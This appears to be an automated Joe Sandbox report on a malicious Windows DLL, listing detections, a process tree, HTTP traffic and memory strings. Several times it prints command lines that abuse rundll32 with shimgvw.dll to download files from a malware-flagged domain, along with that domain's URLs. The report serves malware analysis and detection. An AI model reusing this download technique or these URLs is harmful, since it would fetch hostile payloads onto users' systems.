Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Dll1.dll

Overview

General Information

Sample name:Dll1.dll
Analysis ID:1500782
MD5:b14ef85a60ac71c669cc960bdf580144
SHA1:08906644b0ef1ee6478c45a6e0dd28533a9efc29
SHA256:861911e953e6fd0a015b3a91a7528a388a535c83f4b9a5cf7366b8209d2f00c3
Tags:dll
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Execute DLL with spoofed extension
Sigma detected: rundll32 run dll from internet
System process connects to network (likely due to code injection or exploit)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potentially Suspicious Rundll32 Activity
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7396 cmdline: loaddll32.exe "C:\Users\user\Desktop\Dll1.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7448 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Dll1.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7472 cmdline: rundll32.exe "C:\Users\user\Desktop\Dll1.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 7500 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 7748 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7456 cmdline: rundll32.exe C:\Users\user\Desktop\Dll1.dll,mydllmain MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 7484 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 7756 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7952 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 8024 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Potentially Suspicious Rundll32 Activity
Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\Dll1.dll,mydllmain, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7456, ParentProcessName: rundll32.exe, ProcessCommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, ProcessId: 7484, ProcessName: rundll32.exe

Data Obfuscation

barindex
Sigma detected: Execute DLL with spoofed extension
Source: Process startedAuthor: Joe Security: Data: Command: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\Dll1.dll,mydllmain, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7456, ParentProcessName: rundll32.exe, ProcessCommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, ProcessId: 7484, ProcessName: rundll32.exe
Sigma detected: rundll32 run dll from internet
Source: Process startedAuthor: Joe Security: Data: Command: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\Dll1.dll,mydllmain, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7456, ParentProcessName: rundll32.exe, ProcessCommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, ProcessId: 7484, ProcessName: rundll32.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://rammenale.com/for2/aclog.txtQ8Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpaC:Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp%Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtJAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtPRAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp$qAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpentAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclogIAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtheAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpryhAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4JAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtOAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtPgAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txteAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtfAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4rAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp.(Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp60Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtdAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt-Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpent0Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtentgAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmprmhAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtentAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtagAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt(Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpoAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclogAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpqAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt:Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpkAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpzAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog&Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpsAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpmpfAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmptAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp6634-1003Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpC:Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4pAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmphAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtentindowsINetCookiesAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpE0Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt6634-1003Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpjAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4rAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpdAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt49?Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtC:Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclogtxtHAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpYAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt&8Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4erAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpPRAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpentindowsINetCookiesAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtftAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtjxAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpUAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpVAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclogtxtBAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4eAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtmAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtV~Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclogtxtAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtrAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtsAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpGAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp5AAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpEAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtpAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp/Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtWkAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp0Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpmpAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpR0Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp2Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtzAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtP;Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4TAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4PAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: Dll1.dllReversingLabs: Detection: 31%
Source: Dll1.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: Dll1.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9E1629 FindFirstFileW,CloseHandle,_strlen,ExpandEnvironmentStringsW,CopyFileW,Sleep,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,0_2_6F9E1629
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9F1C74 FindFirstFileExW,0_2_6F9F1C74
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9E1629 FindFirstFileW,CloseHandle,_strlen,ExpandEnvironmentStringsW,CopyFileW,Sleep,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,3_2_6F9E1629
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9F1C74 FindFirstFileExW,3_2_6F9F1C74

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 131.153.206.231 443
Source: Joe Sandbox ViewASN Name: SS-ASHUS SS-ASHUS
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: rammenale.com
Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Wed, 28 Aug 2024 20:45:57 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Wed, 28 Aug 2024 20:45:57 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Wed, 28 Aug 2024 20:45:58 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Wed, 28 Aug 2024 20:45:58 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Wed, 28 Aug 2024 20:45:59 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Wed, 28 Aug 2024 20:46:00 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: rundll32.exe, 00000005.00000002.3274732553.0000000008450000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3274805413.0000000008481000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/
Source: rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/1p
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/D
Source: rundll32.exe, 00000005.00000002.3274732553.0000000008450000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/J
Source: rundll32.exe, 00000006.00000002.3274805413.0000000008481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/K
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/M
Source: rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/R#
Source: rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/Si
Source: rundll32.exe, 0000000B.00000002.3274421722.0000000004D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog
Source: rundll32.exe, 00000006.00000002.3274805413.00000000084B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog&
Source: rundll32.exe, 0000000B.00000002.3272399936.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.00000000088B8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.00000000088A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt
Source: rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt&8
Source: rundll32.exe, 00000006.00000002.3274805413.00000000084B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt(
Source: rundll32.exe, 00000005.00000002.3274732553.0000000008486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt-
Source: rundll32.exe, 00000006.00000002.3274805413.0000000008481000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.000000000891D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4
Source: rundll32.exe, 00000006.00000002.3274805413.0000000008481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt49?
Source: rundll32.exe, 00000005.00000002.3274732553.0000000008469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4J
Source: rundll32.exe, 00000006.00000002.3274805413.0000000008499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4er
Source: rundll32.exe, 00000005.00000002.3274732553.0000000008450000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4j
Source: rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4p
Source: rundll32.exe, 00000005.00000002.3274732553.0000000008450000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4r
Source: rundll32.exe, 00000005.00000002.3274732553.0000000008423000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3274805413.0000000008453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.00000000088A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt6634-1003
Source: rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt:
Source: rundll32.exe, 00000005.00000002.3272308201.0000000002670000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3273346372.00000000027E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3272227188.0000000002610000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3273406270.00000000027A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3272218090.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3272399936.0000000002C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtC:
Source: rundll32.exe, 00000005.00000002.3272308201.000000000267A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtF
Source: rundll32.exe, 00000006.00000002.3274805413.0000000008453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtJ
Source: rundll32.exe, 00000005.00000002.3272308201.00000000026E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtO
Source: rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtP;
